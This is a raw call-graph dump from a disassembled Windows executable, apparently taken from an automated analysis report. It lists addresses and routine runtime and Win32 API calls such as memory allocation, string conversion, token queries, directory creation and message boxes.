16732 7ff7262a0d83 16729->16732 16731 7ff72629ff48 12 API calls 16730->16731 16734 7ff7262a0d03 16730->16734 16731->16734 16733 7ff7262a9b24 _invalid_parameter_noinfo 37 API calls 16732->16733 16733->16734 16734->16657 16736 7ff7262a3a0f 16735->16736 16738 7ff7262a3a13 __crtLCMapStringW 16736->16738 16915 7ff7262a3a68 16736->16915 16738->16657 16740 7ff7262a14b7 16739->16740 16741 7ff7262a14e6 16740->16741 16743 7ff7262a15a3 16740->16743 16742 7ff72629ff48 12 API calls 16741->16742 16745 7ff7262a1523 16741->16745 16742->16745 16744 7ff7262a9b24 _invalid_parameter_noinfo 37 API calls 16743->16744 16744->16745 16745->16657 16747 7ff7262a3af7 16746->16747 16919 7ff7262accc8 16747->16919 16753 7ff7262add49 16752->16753 16761 7ff7262add57 16752->16761 16754 7ff7262add77 16753->16754 16755 7ff7262a3ae0 45 API calls 16753->16755 16753->16761 16756 7ff7262addaf 16754->16756 16757 7ff7262add88 16754->16757 16755->16754 16759 7ff7262addd9 16756->16759 16760 7ff7262ade3a 16756->16760 16756->16761 16927 7ff7262af3b0 16757->16927 16759->16761 16930 7ff7262aebb0 16759->16930 16762 7ff7262aebb0 _fread_nolock MultiByteToWideChar 16760->16762 16761->16660 16762->16761 16765 7ff72629fed7 16764->16765 16771 7ff72629fec6 16764->16771 16765->16771 16794 7ff7262ac90c 16765->16794 16767 7ff72629ff18 16770 7ff7262a9c58 __free_lconv_mon 11 API calls 16767->16770 16769 7ff7262a9c58 __free_lconv_mon 11 API calls 16769->16767 16770->16771 16772 7ff7262ad880 16771->16772 16773 7ff7262ad8d0 16772->16773 16774 7ff7262ad89d 16772->16774 16773->16774 16777 7ff7262ad902 16773->16777 16775 7ff7262a9b24 _invalid_parameter_noinfo 37 API calls 16774->16775 16776 7ff7262a35c1 16775->16776 16776->16707 16776->16708 16782 7ff7262ada15 16777->16782 16787 7ff7262ad94a 16777->16787 16778 7ff7262adb07 16834 7ff7262acd6c 16778->16834 16780 7ff7262adacd 16827 7ff7262ad104 16780->16827 16782->16778 16782->16780 16783 7ff7262ada9c 16782->16783 16785 7ff7262ada5f 16782->16785 16786 7ff7262ada55 16782->16786 16820 7ff7262ad3e4 16783->16820 16810 7ff7262ad614 16785->16810 16786->16780 16789 7ff7262ada5a 16786->16789 16787->16776 16801 7ff7262a97b4 16787->16801 16789->16783 16789->16785 16792 7ff7262a9c10 _isindst 17 API calls 16793 7ff7262adb64 16792->16793 16795 7ff7262ac957 16794->16795 16796 7ff7262ac91b _get_daylight 16794->16796 16798 7ff7262a43f4 _get_daylight 11 API calls 16795->16798 16796->16795 16797 7ff7262ac93e HeapAlloc 16796->16797 16800 7ff7262b28a0 _get_daylight 2 API calls 16796->16800 16797->16796 16799 7ff72629ff04 16797->16799 16798->16799 16799->16767 16799->16769 16800->16796 16802 7ff7262a97c1 16801->16802 16803 7ff7262a97cb 16801->16803 16802->16803 16808 7ff7262a97e6 16802->16808 16804 7ff7262a43f4 _get_daylight 11 API calls 16803->16804 16805 7ff7262a97d2 16804->16805 16806 7ff7262a9bf0 _invalid_parameter_noinfo 37 API calls 16805->16806 16807 7ff7262a97de 16806->16807 16807->16776 16807->16792 16808->16807 16809 7ff7262a43f4 _get_daylight 11 API calls 16808->16809 16809->16805 16843 7ff7262b33bc 16810->16843 16814 7ff7262ad6bc 16815 7ff7262ad711 16814->16815 16817 7ff7262ad6dc 16814->16817 16819 7ff7262ad6c0 16814->16819 16896 7ff7262ad200 16815->16896 16892 7ff7262ad4bc 16817->16892 16819->16776 16821 7ff7262b33bc 38 API calls 16820->16821 16822 7ff7262ad42e 16821->16822 16823 7ff7262b2e04 37 API calls 16822->16823 16824 7ff7262ad47e 16823->16824 16825 7ff7262ad4bc 45 API calls 16824->16825 16826 7ff7262ad482 16824->16826 16825->16826 16826->16776 16828 7ff7262b33bc 38 API calls 16827->16828 16829 7ff7262ad14f 16828->16829 16830 7ff7262b2e04 37 API calls 16829->16830 16831 7ff7262ad1a7 16830->16831 16832 7ff7262ad1ab 16831->16832 16833 7ff7262ad200 45 API calls 16831->16833 16832->16776 16833->16832 16835 7ff7262acdb1 16834->16835 16836 7ff7262acde4 16834->16836 16837 7ff7262a9b24 _invalid_parameter_noinfo 37 API calls 16835->16837 16838 7ff7262acdfc 16836->16838 16840 7ff7262ace7d 16836->16840 16842 7ff7262acddd __scrt_get_show_window_mode 16837->16842 16839 7ff7262ad104 46 API calls 16838->16839 16839->16842 16841 7ff7262a3ae0 45 API calls 16840->16841 16840->16842 16841->16842 16842->16776 16844 7ff7262b340f fegetenv 16843->16844 16845 7ff7262b713c 37 API calls 16844->16845 16849 7ff7262b3462 16845->16849 16846 7ff7262b348f 16851 7ff7262a97b4 __std_exception_copy 37 API calls 16846->16851 16847 7ff7262b3552 16848 7ff7262b713c 37 API calls 16847->16848 16850 7ff7262b357c 16848->16850 16849->16847 16852 7ff7262b347d 16849->16852 16853 7ff7262b352c 16849->16853 16854 7ff7262b713c 37 API calls 16850->16854 16855 7ff7262b350d 16851->16855 16852->16846 16852->16847 16858 7ff7262a97b4 __std_exception_copy 37 API calls 16853->16858 16856 7ff7262b358d 16854->16856 16857 7ff7262b4634 16855->16857 16862 7ff7262b3515 16855->16862 16859 7ff7262b7330 20 API calls 16856->16859 16860 7ff7262a9c10 _isindst 17 API calls 16857->16860 16858->16855 16869 7ff7262b35f6 __scrt_get_show_window_mode 16859->16869 16861 7ff7262b4649 16860->16861 16863 7ff72629b870 _log10_special 8 API calls 16862->16863 16864 7ff7262ad661 16863->16864 16888 7ff7262b2e04 16864->16888 16865 7ff7262b399f __scrt_get_show_window_mode 16866 7ff7262b3cdf 16867 7ff7262b2f20 37 API calls 16866->16867 16874 7ff7262b43f7 16867->16874 16868 7ff7262b3c8b 16868->16866 16871 7ff7262b464c memcpy_s 37 API calls 16868->16871 16869->16865 16870 7ff7262b3637 memcpy_s 16869->16870 16872 7ff7262a43f4 _get_daylight 11 API calls 16869->16872 16883 7ff7262b3f7b memcpy_s __scrt_get_show_window_mode 16870->16883 16886 7ff7262b3a93 memcpy_s __scrt_get_show_window_mode 16870->16886 16871->16866 16873 7ff7262b3a70 16872->16873 16875 7ff7262a9bf0 _invalid_parameter_noinfo 37 API calls 16873->16875 16876 7ff7262b464c memcpy_s 37 API calls 16874->16876 16881 7ff7262b4452 16874->16881 16875->16870 16876->16881 16877 7ff7262b45d8 16878 7ff7262b713c 37 API calls 16877->16878 16878->16862 16879 7ff7262a43f4 11 API calls _get_daylight 16879->16883 16880 7ff7262a43f4 11 API calls _get_daylight 16880->16886 16881->16877 16884 7ff7262b2f20 37 API calls 16881->16884 16887 7ff7262b464c memcpy_s 37 API calls 16881->16887 16882 7ff7262a9bf0 37 API calls _invalid_parameter_noinfo 16882->16886 16883->16866 16883->16868 16883->16879 16885 7ff7262a9bf0 37 API calls _invalid_parameter_noinfo 16883->16885 16884->16881 16885->16883 16886->16868 16886->16880 16886->16882 16887->16881 16889 7ff7262b2e23 16888->16889 16890 7ff7262a9b24 _invalid_parameter_noinfo 37 API calls 16889->16890 16891 7ff7262b2e4e memcpy_s 16889->16891 16890->16891 16891->16814 16893 7ff7262ad4e8 memcpy_s 16892->16893 16894 7ff7262a3ae0 45 API calls 16893->16894 16895 7ff7262ad5a2 memcpy_s __scrt_get_show_window_mode 16893->16895 16894->16895 16895->16819 16897 7ff7262ad23b 16896->16897 16901 7ff7262ad288 memcpy_s 16896->16901 16898 7ff7262a9b24 _invalid_parameter_noinfo 37 API calls 16897->16898 16899 7ff7262ad267 16898->16899 16899->16819 16900 7ff7262ad2f3 16902 7ff7262a97b4 __std_exception_copy 37 API calls 16900->16902 16901->16900 16903 7ff7262a3ae0 45 API calls 16901->16903 16906 7ff7262ad335 memcpy_s 16902->16906 16903->16900 16904 7ff7262a9c10 _isindst 17 API calls 16905 7ff7262ad3e0 16904->16905 16906->16904 16908 7ff72629ff7f 16907->16908 16914 7ff72629ff6e 16907->16914 16909 7ff7262ac90c _fread_nolock 12 API calls 16908->16909 16908->16914 16910 7ff72629ffb0 16909->16910 16911 7ff7262a9c58 __free_lconv_mon 11 API calls 16910->16911 16913 7ff72629ffc4 16910->16913 16911->16913 16912 7ff7262a9c58 __free_lconv_mon 11 API calls 16912->16914 16913->16912 16914->16727 16916 7ff7262a3a86 16915->16916 16917 7ff7262a3a8e 16915->16917 16918 7ff7262a3ae0 45 API calls 16916->16918 16917->16738 16918->16917 16920 7ff7262acce1 16919->16920 16921 7ff7262a3b1f 16919->16921 16920->16921 16922 7ff7262b2614 45 API calls 16920->16922 16923 7ff7262acd34 16921->16923 16922->16921 16924 7ff7262a3b2f 16923->16924 16925 7ff7262acd4d 16923->16925 16924->16660 16925->16924 16926 7ff7262b1960 45 API calls 16925->16926 16926->16924 16933 7ff7262b6098 16927->16933 16932 7ff7262aebb9 MultiByteToWideChar 16930->16932 16936 7ff7262b60fc 16933->16936 16934 7ff72629b870 _log10_special 8 API calls 16935 7ff7262af3cd 16934->16935 16935->16761 16936->16934 16938 7ff7262a032f 16937->16938 16939 7ff7262a031d 16937->16939 16942 7ff7262a033d 16938->16942 16946 7ff7262a0379 16938->16946 16940 7ff7262a43f4 _get_daylight 11 API calls 16939->16940 16941 7ff7262a0322 16940->16941 16943 7ff7262a9bf0 _invalid_parameter_noinfo 37 API calls 16941->16943 16944 7ff7262a9b24 _invalid_parameter_noinfo 37 API calls 16942->16944 16951 7ff7262a032d 16943->16951 16944->16951 16945 7ff7262a06f5 16947 7ff7262a43f4 _get_daylight 11 API calls 16945->16947 16945->16951 16946->16945 16948 7ff7262a43f4 _get_daylight 11 API calls 16946->16948 16949 7ff7262a0989 16947->16949 16950 7ff7262a06ea 16948->16950 16952 7ff7262a9bf0 _invalid_parameter_noinfo 37 API calls 16949->16952 16953 7ff7262a9bf0 _invalid_parameter_noinfo 37 API calls 16950->16953 16951->16625 16952->16951 16953->16945 16955 7ff72629fa24 16954->16955 16984 7ff72629f784 16955->16984 16957 7ff72629fa3d 16957->16300 16996 7ff72629f6dc 16958->16996 16962 7ff72629277c 16961->16962 16963 7ff7262a43f4 _get_daylight 11 API calls 16962->16963 16964 7ff726292799 16963->16964 17010 7ff7262a3ca4 16964->17010 16969 7ff726291bf0 49 API calls 16970 7ff726292807 16969->16970 16971 7ff7262986b0 2 API calls 16970->16971 16972 7ff72629281f 16971->16972 16973 7ff726292843 MessageBoxA 16972->16973 16974 7ff72629282c MessageBoxW 16972->16974 16975 7ff726292855 16973->16975 16974->16975 16976 7ff72629b870 _log10_special 8 API calls 16975->16976 16977 7ff726292865 16976->16977 16977->16329 16979 7ff72629f439 16978->16979 16980 7ff726291b06 16978->16980 16981 7ff7262a43f4 _get_daylight 11 API calls 16979->16981 16980->16328 16980->16329 16982 7ff72629f43e 16981->16982 16983 7ff7262a9bf0 _invalid_parameter_noinfo 37 API calls 16982->16983 16983->16980 16985 7ff72629f7ee 16984->16985 16986 7ff72629f7ae 16984->16986 16985->16986 16988 7ff72629f7fa 16985->16988 16987 7ff7262a9b24 _invalid_parameter_noinfo 37 API calls 16986->16987 16994 7ff72629f7d5 16987->16994 16995 7ff7262a477c EnterCriticalSection 16988->16995 16994->16957 16997 7ff72629f706 16996->16997 16998 7ff7262919b9 16996->16998 16997->16998 16999 7ff72629f752 16997->16999 17000 7ff72629f715 __scrt_get_show_window_mode 16997->17000 16998->16306 16998->16307 17009 7ff7262a477c EnterCriticalSection 16999->17009 17002 7ff7262a43f4 _get_daylight 11 API calls 17000->17002 17004 7ff72629f72a 17002->17004 17006 7ff7262a9bf0 _invalid_parameter_noinfo 37 API calls 17004->17006 17006->16998 17013 7ff7262a3cfe 17010->17013 17011 7ff7262a3d23 17012 7ff7262a9b24 _invalid_parameter_noinfo 37 API calls 17011->17012 17016 7ff7262a3d4d 17012->17016 17013->17011 17014 7ff7262a3d5f 17013->17014 17040 7ff7262a1f30 17014->17040 17018 7ff72629b870 _log10_special 8 API calls 17016->17018 17017 7ff7262a3e3c 17019 7ff7262a9c58 __free_lconv_mon 11 API calls 17017->17019 17020 7ff7262927d8 17018->17020 17019->17016 17028 7ff7262a4480 17020->17028 17022 7ff7262a3e60 17022->17017 17024 7ff7262a3e6a 17022->17024 17023 7ff7262a3e11 17025 7ff7262a9c58 __free_lconv_mon 11 API calls 17023->17025 17027 7ff7262a9c58 __free_lconv_mon 11 API calls 17024->17027 17025->17016 17026 7ff7262a3e08 17026->17017 17026->17023 17027->17016 17029 7ff7262aa5d8 _get_daylight 11 API calls 17028->17029 17030 7ff7262a4497 17029->17030 17031 7ff7262927df 17030->17031 17032 7ff7262adea8 _get_daylight 11 API calls 17030->17032 17034 7ff7262a44d7 17030->17034 17031->16969 17033 7ff7262a44cc 17032->17033 17035 7ff7262a9c58 __free_lconv_mon 11 API calls 17033->17035 17034->17031 17178 7ff7262adf30 17034->17178 17035->17034 17038 7ff7262a9c10 _isindst 17 API calls 17039 7ff7262a451c 17038->17039 17041 7ff7262a1f6e 17040->17041 17042 7ff7262a1f5e 17040->17042 17043 7ff7262a1f77 17041->17043 17048 7ff7262a1fa5 17041->17048 17044 7ff7262a9b24 _invalid_parameter_noinfo 37 API calls 17042->17044 17045 7ff7262a9b24 _invalid_parameter_noinfo 37 API calls 17043->17045 17046 7ff7262a1f9d 17044->17046 17045->17046 17046->17017 17046->17022 17046->17023 17046->17026 17047 7ff7262a3ae0 45 API calls 17047->17048 17048->17042 17048->17046 17048->17047 17050 7ff7262a2254 17048->17050 17054 7ff7262a28c0 17048->17054 17080 7ff7262a2588 17048->17080 17110 7ff7262a1e10 17048->17110 17052 7ff7262a9b24 _invalid_parameter_noinfo 37 API calls 17050->17052 17052->17042 17055 7ff7262a2902 17054->17055 17056 7ff7262a2975 17054->17056 17057 7ff7262a299f 17055->17057 17058 7ff7262a2908 17055->17058 17059 7ff7262a29cf 17056->17059 17060 7ff7262a297a 17056->17060 17127 7ff7262a0e70 17057->17127 17066 7ff7262a290d 17058->17066 17069 7ff7262a29de 17058->17069 17059->17057 17059->17069 17078 7ff7262a2938 17059->17078 17061 7ff7262a29af 17060->17061 17062 7ff7262a297c 17060->17062 17134 7ff7262a0a60 17061->17134 17063 7ff7262a291d 17062->17063 17068 7ff7262a298b 17062->17068 17079 7ff7262a2a0d 17063->17079 17113 7ff7262a3224 17063->17113 17066->17063 17070 7ff7262a2950 17066->17070 17066->17078 17068->17057 17072 7ff7262a2990 17068->17072 17069->17079 17141 7ff7262a1280 17069->17141 17070->17079 17123 7ff7262a36e0 17070->17123 17075 7ff7262a3878 37 API calls 17072->17075 17072->17079 17074 7ff72629b870 _log10_special 8 API calls 17076 7ff7262a2ca3 17074->17076 17075->17078 17076->17048 17078->17079 17148 7ff7262adb68 17078->17148 17079->17074 17081 7ff7262a2593 17080->17081 17082 7ff7262a25a9 17080->17082 17083 7ff7262a25e7 17081->17083 17084 7ff7262a2902 17081->17084 17085 7ff7262a2975 17081->17085 17082->17083 17086 7ff7262a9b24 _invalid_parameter_noinfo 37 API calls 17082->17086 17083->17048 17087 7ff7262a299f 17084->17087 17088 7ff7262a2908 17084->17088 17089 7ff7262a29cf 17085->17089 17090 7ff7262a297a 17085->17090 17086->17083 17094 7ff7262a0e70 38 API calls 17087->17094 17096 7ff7262a290d 17088->17096 17098 7ff7262a29de 17088->17098 17089->17087 17089->17098 17100 7ff7262a2938 17089->17100 17091 7ff7262a29af 17090->17091 17092 7ff7262a297c 17090->17092 17097 7ff7262a0a60 38 API calls 17091->17097 17093 7ff7262a291d 17092->17093 17102 7ff7262a298b 17092->17102 17095 7ff7262a3224 47 API calls 17093->17095 17109 7ff7262a2a0d 17093->17109 17094->17100 17095->17100 17096->17093 17099 7ff7262a2950 17096->17099 17096->17100 17097->17100 17101 7ff7262a1280 38 API calls 17098->17101 17098->17109 17103 7ff7262a36e0 47 API calls 17099->17103 17099->17109 17108 7ff7262adb68 47 API calls 17100->17108 17100->17109 17101->17100 17102->17087 17104 7ff7262a2990 17102->17104 17103->17100 17106 7ff7262a3878 37 API calls 17104->17106 17104->17109 17105 7ff72629b870 _log10_special 8 API calls 17107 7ff7262a2ca3 17105->17107 17106->17100 17107->17048 17108->17100 17109->17105 17161 7ff7262a0034 17110->17161 17114 7ff7262a3246 17113->17114 17115 7ff72629fea0 12 API calls 17114->17115 17116 7ff7262a328e 17115->17116 17117 7ff7262ad880 46 API calls 17116->17117 17118 7ff7262a3361 17117->17118 17119 7ff7262a3383 17118->17119 17120 7ff7262a3ae0 45 API calls 17118->17120 17121 7ff7262a3ae0 45 API calls 17119->17121 17122 7ff7262a340c 17119->17122 17120->17119 17121->17122 17122->17078 17124 7ff7262a3760 17123->17124 17125 7ff7262a36f8 17123->17125 17124->17078 17125->17124 17126 7ff7262adb68 47 API calls 17125->17126 17126->17124 17128 7ff7262a0ea3 17127->17128 17129 7ff7262a0ed2 17128->17129 17132 7ff7262a0f8f 17128->17132 17130 7ff7262a0f0f 17129->17130 17131 7ff72629fea0 12 API calls 17129->17131 17130->17078 17131->17130 17133 7ff7262a9b24 _invalid_parameter_noinfo 37 API calls 17132->17133 17133->17130 17136 7ff7262a0a93 17134->17136 17135 7ff7262a0ac2 17137 7ff72629fea0 12 API calls 17135->17137 17140 7ff7262a0aff 17135->17140 17136->17135 17138 7ff7262a0b7f 17136->17138 17137->17140 17139 7ff7262a9b24 _invalid_parameter_noinfo 37 API calls 17138->17139 17139->17140 17140->17078 17142 7ff7262a12b3 17141->17142 17143 7ff7262a12e2 17142->17143 17145 7ff7262a139f 17142->17145 17144 7ff72629fea0 12 API calls 17143->17144 17147 7ff7262a131f 17143->17147 17144->17147 17146 7ff7262a9b24 _invalid_parameter_noinfo 37 API calls 17145->17146 17146->17147 17147->17078 17149 7ff7262adb90 17148->17149 17150 7ff7262adbd5 17149->17150 17151 7ff7262a3ae0 45 API calls 17149->17151 17153 7ff7262adb95 __scrt_get_show_window_mode 17149->17153 17157 7ff7262adbbe __scrt_get_show_window_mode 17149->17157 17150->17153 17150->17157 17158 7ff7262afaf8 17150->17158 17151->17150 17152 7ff7262a9b24 _invalid_parameter_noinfo 37 API calls 17152->17153 17153->17078 17157->17152 17157->17153 17160 7ff7262afb1c WideCharToMultiByte 17158->17160 17162 7ff7262a0061 17161->17162 17163 7ff7262a0073 17161->17163 17164 7ff7262a43f4 _get_daylight 11 API calls 17162->17164 17165 7ff7262a0080 17163->17165 17169 7ff7262a00bd 17163->17169 17166 7ff7262a0066 17164->17166 17167 7ff7262a9b24 _invalid_parameter_noinfo 37 API calls 17165->17167 17168 7ff7262a9bf0 _invalid_parameter_noinfo 37 API calls 17166->17168 17175 7ff7262a0071 17167->17175 17168->17175 17170 7ff7262a0166 17169->17170 17171 7ff7262a43f4 _get_daylight 11 API calls 17169->17171 17172 7ff7262a43f4 _get_daylight 11 API calls 17170->17172 17170->17175 17173 7ff7262a015b 17171->17173 17174 7ff7262a0210 17172->17174 17176 7ff7262a9bf0 _invalid_parameter_noinfo 37 API calls 17173->17176 17177 7ff7262a9bf0 _invalid_parameter_noinfo 37 API calls 17174->17177 17175->17048 17176->17170 17177->17175 17180 7ff7262adf4d 17178->17180 17179 7ff7262adf52 17181 7ff7262a44fd 17179->17181 17182 7ff7262a43f4 _get_daylight 11 API calls 17179->17182 17180->17179 17180->17181 17185 7ff7262adf9c 17180->17185 17181->17031 17181->17038 17183 7ff7262adf5c 17182->17183 17184 7ff7262a9bf0 _invalid_parameter_noinfo 37 API calls 17183->17184 17184->17181 17185->17181 17186 7ff7262a43f4 _get_daylight 11 API calls 17185->17186 17186->17183 17188 7ff7262a7555 17187->17188 17189 7ff7262a7568 17187->17189 17190 7ff7262a43f4 _get_daylight 11 API calls 17188->17190 17197 7ff7262a71cc 17189->17197 17192 7ff7262a755a 17190->17192 17194 7ff7262a9bf0 _invalid_parameter_noinfo 37 API calls 17192->17194 17195 7ff7262a7566 17194->17195 17195->16347 17204 7ff7262af5e8 EnterCriticalSection 17197->17204 17206 7ff726297b91 GetTokenInformation 17205->17206 17207 7ff726297c13 __std_exception_copy 17205->17207 17208 7ff726297bb2 GetLastError 17206->17208 17211 7ff726297bbd 17206->17211 17209 7ff726297c26 CloseHandle 17207->17209 17210 7ff726297c2c 17207->17210 17208->17207 17208->17211 17209->17210 17210->16356 17211->17207 17212 7ff726297bd9 GetTokenInformation 17211->17212 17212->17207 17213 7ff726297bfc 17212->17213 17213->17207 17214 7ff726297c06 ConvertSidToStringSidW 17213->17214 17214->17207 17216 7ff72629297a 17215->17216 17217 7ff7262a3ef8 48 API calls 17216->17217 17218 7ff7262929a2 MessageBoxW 17217->17218 17219 7ff72629b870 _log10_special 8 API calls 17218->17219 17220 7ff7262929cc 17219->17220 17220->16366 17222 7ff726292555 17221->17222 17223 7ff7262a3ef8 48 API calls 17222->17223 17224 7ff726292574 17223->17224 17224->16385 17260 7ff7262a7aac 17225->17260 17229 7ff7262977dc 17228->17229 17230 7ff7262986b0 2 API calls 17229->17230 17231 7ff7262977fb 17230->17231 17232 7ff726297803 17231->17232 17233 7ff726297816 ExpandEnvironmentStringsW 17231->17233 17234 7ff7262926c0 49 API calls 17232->17234 17235 7ff72629783c __std_exception_copy 17233->17235 17259 7ff72629780f __std_exception_copy 17234->17259 17236 7ff726297840 17235->17236 17237 7ff726297853 17235->17237 17239 7ff7262926c0 49 API calls 17236->17239 17241 7ff7262978bf 17237->17241 17242 7ff726297861 GetDriveTypeW 17237->17242 17238 7ff72629b870 _log10_special 8 API calls 17240 7ff7262979a7 17238->17240 17239->17259 17243 7ff7262a7118 45 API calls 17241->17243 17245 7ff7262978b0 17242->17245 17246 7ff726297895 17242->17246 17259->17238 17301 7ff7262b0868 17260->17301 17360 7ff7262b05e0 17301->17360 17381 7ff7262af5e8 EnterCriticalSection 17360->17381 17400 7ff726293f70 108 API calls 17399->17400 17401 7ff726291463 17400->17401 17402 7ff72629146b 17401->17402 17403 7ff72629148c 17401->17403 17404 7ff7262925f0 53 API calls 17402->17404 17405 7ff72629f9f4 73 API calls 17403->17405 17406 7ff72629147b 17404->17406 17407 7ff7262914a1 17405->17407 17406->16416 17408 7ff7262914c1 17407->17408 17409 7ff7262914a5 17407->17409 17411 7ff7262914f1 17408->17411 17412 7ff7262914d1 17408->17412 17410 7ff726292760 53 API calls 17409->17410 17418 7ff7262914bc __std_exception_copy 17410->17418 17415 7ff7262914f7 17411->17415 17420 7ff72629150a 17411->17420 17413 7ff726292760 53 API calls 17412->17413 17413->17418 17414 7ff72629f36c 74 API calls 17416 7ff726291584 17414->17416 17423 7ff7262911f0 17415->17423 17416->16416 17418->17414 17419 7ff72629f6bc _fread_nolock 53 API calls 17419->17420 17420->17418 17420->17419 17421 7ff726291596 17420->17421 17422 7ff726292760 53 API calls 17421->17422 17422->17418 17424 7ff726291248 17423->17424 17425 7ff72629124f 17424->17425 17426 7ff726291277 17424->17426 17427 7ff7262925f0 53 API calls 17425->17427 17429 7ff726291291 17426->17429 17430 7ff7262912ad 17426->17430 17428 7ff726291262 17427->17428 17428->17418 17431 7ff726292760 53 API calls 17429->17431 17433 7ff7262912bf 17430->17433 17439 7ff7262912db memcpy_s 17430->17439 17432 7ff7262912a8 17431->17432 17447 7ff72629ad80 17432->17447 17434 7ff726292760 53 API calls 17433->17434 17434->17432 17436 7ff72629f6bc _fread_nolock 53 API calls 17436->17439 17437 7ff72629f430 37 API calls 17437->17439 17438 7ff726291413 __std_exception_copy 17438->17418 17439->17432 17439->17436 17439->17437 17442 7ff72629139f 17439->17442 17443 7ff72629fdfc 17439->17443 17440 7ff7262925f0 53 API calls 17440->17432 17442->17440 17444 7ff72629fe2c 17443->17444 17451 7ff72629fb4c 17444->17451 17446 7ff72629fe4a 17446->17439 17448 7ff72629ad8e 17447->17448 17449 7ff72629add2 17447->17449 17448->17449 17450 7ff7262a9c58 11 API calls 17448->17450 17449->17438 17450->17449 17452 7ff72629fb6c 17451->17452 17457 7ff72629fb99 17451->17457 17453 7ff72629fba1 17452->17453 17454 7ff72629fb76 17452->17454 17452->17457 17458 7ff72629fa8c 17453->17458 17455 7ff7262a9b24 _invalid_parameter_noinfo 37 API calls 17454->17455 17455->17457 17457->17446 17465 7ff7262a477c EnterCriticalSection 17458->17465 17467 7ff726293f1a 17466->17467 17468 7ff7262986b0 2 API calls 17467->17468 17469 7ff726293f3f 17468->17469 17470 7ff72629b870 _log10_special 8 API calls 17469->17470 17471 7ff726293f67 17470->17471 17471->16439 17473 7ff72629753e 17472->17473 17474 7ff726291bf0 49 API calls 17473->17474 17478 7ff726297662 17473->17478 17475 7ff7262975c5 17474->17475 17475->17478 17479 7ff726291bf0 49 API calls 17475->17479 17480 7ff726293f10 10 API calls 17475->17480 17481 7ff7262986b0 2 API calls 17475->17481 17476 7ff72629b870 _log10_special 8 API calls 17477 7ff726297693 17476->17477 17477->16439 17478->17476 17479->17475 17480->17475 17482 7ff726297633 CreateDirectoryW 17481->17482 17482->17475 17482->17478 17484 7ff7262915d3 17483->17484 17485 7ff7262915f7 17483->17485 17572 7ff726291050 17484->17572 17486 7ff726293f70 108 API calls 17485->17486 17488 7ff72629160b 17486->17488 17490 7ff726291613 17488->17490 17491 7ff72629163b 17488->17491 17489 7ff7262915d8 17492 7ff7262915ee 17489->17492 17493 7ff7262925f0 53 API calls 17489->17493 17494 7ff726292760 53 API calls 17490->17494 17495 7ff726293f70 108 API calls 17491->17495 17492->16439 17493->17492 17496 7ff72629162a 17494->17496 17497 7ff72629164f 17495->17497 17496->16439 17498 7ff726291671 17497->17498 17499 7ff726291657 17497->17499 17501 7ff72629f9f4 73 API calls 17498->17501 17500 7ff7262925f0 53 API calls 17499->17500 17503 7ff726291667 17500->17503 17502 7ff726291686 17501->17502 17504 7ff72629168a 17502->17504 17505 7ff7262916ab 17502->17505 17509 7ff72629f36c 74 API calls 17503->17509 17506 7ff726292760 53 API calls 17504->17506 17507 7ff7262916b1 17505->17507 17508 7ff7262916c9 17505->17508 17520 7ff7262916a1 __std_exception_copy 17506->17520 17510 7ff7262911f0 92 API calls 17507->17510 17513 7ff7262916eb 17508->17513 17514 7ff72629170c 17508->17514 17511 7ff7262917cd 17509->17511 17510->17520 17511->16439 17512 7ff72629f36c 74 API calls 17512->17503 17515 7ff726292760 53 API calls 17513->17515 17516 7ff72629f6bc _fread_nolock 53 API calls 17514->17516 17517 7ff726291775 17514->17517 17518 7ff72629fdfc 76 API calls 17514->17518 17514->17520 17515->17520 17516->17514 17519 7ff726292760 53 API calls 17517->17519 17518->17514 17519->17520 17520->17512 17522 7ff726296904 17521->17522 17523 7ff72629694b 17521->17523 17522->17523 17611 7ff7262a4250 17522->17611 17523->16439 17526 7ff726293b51 17525->17526 17527 7ff726293e90 49 API calls 17526->17527 17528 7ff726293b8b 17527->17528 17529 7ff726293e90 49 API calls 17528->17529 17530 7ff726293b9b 17529->17530 17531 7ff726293bec 17530->17531 17532 7ff726293bbd 17530->17532 17533 7ff726293ac0 51 API calls 17531->17533 17626 7ff726293ac0 17532->17626 17535 7ff726293bea 17533->17535 17536 7ff726293c17 17535->17536 17537 7ff726293c4c 17535->17537 17633 7ff726297400 17536->17633 17539 7ff726293ac0 51 API calls 17537->17539 17541 7ff726293c70 17539->17541 17544 7ff726293ac0 51 API calls 17541->17544 17550 7ff726293cc2 17541->17550 17542 7ff726293d43 17545 7ff7262918f0 115 API calls 17542->17545 17543 7ff7262925f0 53 API calls 17547 7ff726293c47 17543->17547 17548 7ff726293c99 17544->17548 17549 7ff726293d4d 17545->17549 17546 7ff72629b870 _log10_special 8 API calls 17551 7ff726293de5 17546->17551 17547->17546 17548->17550 17552 7ff726293ac0 51 API calls 17548->17552 17553 7ff726293d55 17549->17553 17554 7ff726293dae 17549->17554 17550->17542 17556 7ff726293d3c 17550->17556 17558 7ff726293cc7 17550->17558 17560 7ff726293d2b 17550->17560 17551->16439 17552->17550 17659 7ff7262917e0 17553->17659 17555 7ff7262925f0 53 API calls 17554->17555 17555->17558 17556->17553 17556->17558 17561 7ff7262925f0 53 API calls 17558->17561 17564 7ff7262925f0 53 API calls 17560->17564 17561->17547 17562 7ff726293d82 17566 7ff7262915c0 118 API calls 17562->17566 17563 7ff726293d6c 17565 7ff7262925f0 53 API calls 17563->17565 17564->17558 17565->17547 17567 7ff726293d90 17566->17567 17567->17547 17568 7ff7262925f0 53 API calls 17567->17568 17568->17547 17570 7ff726291bf0 49 API calls 17569->17570 17571 7ff726293e24 17570->17571 17571->16439 17573 7ff726293f70 108 API calls 17572->17573 17574 7ff72629108b 17573->17574 17575 7ff726291093 17574->17575 17576 7ff7262910a8 17574->17576 17577 7ff7262925f0 53 API calls 17575->17577 17578 7ff72629f9f4 73 API calls 17576->17578 17583 7ff7262910a3 __std_exception_copy 17577->17583 17579 7ff7262910bd 17578->17579 17580 7ff7262910c1 17579->17580 17581 7ff7262910dd 17579->17581 17582 7ff726292760 53 API calls 17580->17582 17584 7ff72629110d 17581->17584 17585 7ff7262910ed 17581->17585 17591 7ff7262910d8 __std_exception_copy 17582->17591 17583->17489 17587 7ff726291113 17584->17587 17594 7ff726291126 17584->17594 17588 7ff726292760 53 API calls 17585->17588 17586 7ff72629f36c 74 API calls 17589 7ff726291194 17586->17589 17590 7ff7262911f0 92 API calls 17587->17590 17588->17591 17589->17583 17597 7ff7262940a0 17589->17597 17590->17591 17591->17586 17593 7ff72629f6bc _fread_nolock 53 API calls 17593->17594 17594->17591 17594->17593 17595 7ff7262911cc 17594->17595 17596 7ff726292760 53 API calls 17595->17596 17596->17591 17598 7ff7262940b0 17597->17598 17599 7ff7262986b0 2 API calls 17598->17599 17600 7ff7262940db 